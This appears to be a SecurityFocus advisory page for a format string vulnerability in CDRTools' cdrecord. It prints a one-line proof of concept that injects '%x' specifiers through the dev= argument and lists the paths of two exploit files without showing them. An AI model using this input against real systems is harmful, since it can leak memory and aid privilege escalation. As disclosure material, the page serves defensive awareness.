info
discussion
exploit
solution
references
CDRTools CDRecord Devname Format String Vulnerability
The following proof of concept was supplied, additional exploit 'priv8cdr.pl' supplied by Priv8security.com:
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
/data/vulnerabilities/exploits/priv8cdr.pl
/data/vulnerabilities/exploits/cdrtoolsexp.c
Privacy Statement
Copyright 2010, SecurityFocus
